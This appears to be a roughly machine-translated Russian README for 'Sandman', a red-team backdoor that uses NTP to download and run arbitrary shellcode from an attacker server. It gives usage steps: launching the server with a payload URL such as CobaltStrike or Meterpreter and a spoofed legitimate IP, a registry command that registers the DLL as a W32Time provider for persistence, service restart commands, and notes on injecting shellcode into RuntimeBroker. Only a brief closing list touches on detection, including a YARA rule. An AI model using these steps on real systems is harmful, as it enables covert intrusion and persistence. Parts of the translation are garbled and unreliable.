Sandman

Sandman - это бэкдор, который предназначен для работы в устойчивых сетях во время воздействия на красную команду.

Sandman работает в качестве Stager и использует NTP (протокол для синхронизации времени и даты), чтобы получить и запустить произвольный шелл с предварительно определенного сервера.

Поскольку NTP является протоколом, который упускают из виду многие защитники, что приводит к широкому доступности сети.

Запустить на Windows / *Nix Machine:

python3 sandman_server.py " Network Adapter " " Payload Url " " optional: ip to spoof "

• Сетевой адаптер: адаптер, на который вы хотите прослушать сервер (например, Ethernet для Windows, ETH0 для *nix).

• URL -адрес полезной нагрузки: URL -адрес вашему шоссе, это может быть ваш агент (например, CobaltStrike или Meterpreter) или другой стагер.

• IP для подделки: если вы хотите подделать законной IP -адрес (например, IP -адрес time.microsoft.com).

Для начала вы можете скомпилировать Sandmanbackdoor, как упомянуто ниже, потому что это единственный легкий исполняемый файл C#, вы можете выполнить его с помощью ExecuteAseSembly, запустить его в качестве поставщика NTP или просто выполнить/ввести его.

Чтобы использовать его, вам нужно будет выполнить простые шаги:

• Добавьте следующее значение реестра:

 reg add " HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW32TimeTimeProvidersNtpClient " /v DllName /t REG_SZ /d " C:PathToTheDll.dll "

• Перезагрузите услугу W32Time:

 sc stop w32time
sc start w32time

Примечание. Убедитесь, что вы компилируете с опцией x64, а не какую -либо параметром процессора!

• Получение и выполнение произвольной полезной нагрузки с контролируемого сервера злоумышленника.

• Может работать в устойчивых сетях, так как NTP обычно разрешается в FW.

• Выражая себя законным NTP -сервером с помощью IP -подготовки.

• Python 3.9

• Требования указаны в файле требований.

Для составления Backdoor я использовал Visual Studio 2022, но, как упоминалось в разделе использования, он может быть составлен как с VS2022, так и с CSC. Вы можете скомпилировать его либо с помощью use_shellcode и использовать ShellCode Orca или без use_shellCode для использования WebClient.

Чтобы скомпилировать Backdoor, я использовал Visual Studio 2022, вам также необходимо установить Dllexport (через Nuget или любой другой путь) для его составления. Вы можете скомпилировать его либо с помощью use_shellcode и использовать ShellCode Orca или без use_shellCode для использования WebClient.

• Шелл -код вводится в Runtimebroker.

• Подозрительное общение NTP начинается с известного волшебного заголовка.

• Яра Правило.

• Orca для шетва.

• Особая благодарность Тиму МакГаффину за идею поставщика времени.

Благодаря тем, кто уже внес свой вклад, и я с радостью приму взносы, сделаю запрос на привлечение, и я рассмотрю его!